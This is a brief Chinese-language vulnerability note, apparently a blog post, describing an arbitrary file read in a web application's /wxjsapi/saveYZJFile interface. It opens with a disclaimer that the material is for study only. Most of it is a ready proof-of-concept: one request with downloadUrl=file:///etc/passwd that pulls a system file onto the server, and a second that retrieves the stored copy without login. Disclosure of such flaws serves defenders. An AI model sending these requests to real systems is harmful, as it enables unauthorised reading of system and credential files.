請遵守網絡安全法!!!本文僅供學習交流使用!用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關!讀者自行承擔其惡果!
主要成因
/wxjsapi/saveYZJFil接口獲取filepath,返回數據包內出現了程序的絕對路徑,攻擊者可以此下載相關敏感文件
構造如下語句
http://x.x.x.x/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
獲取id值如下
通過id值獲取文件內容
http://x.x.x.x/file/fileNoLogin/xxxxxxxxxxxxxxxddfc7e
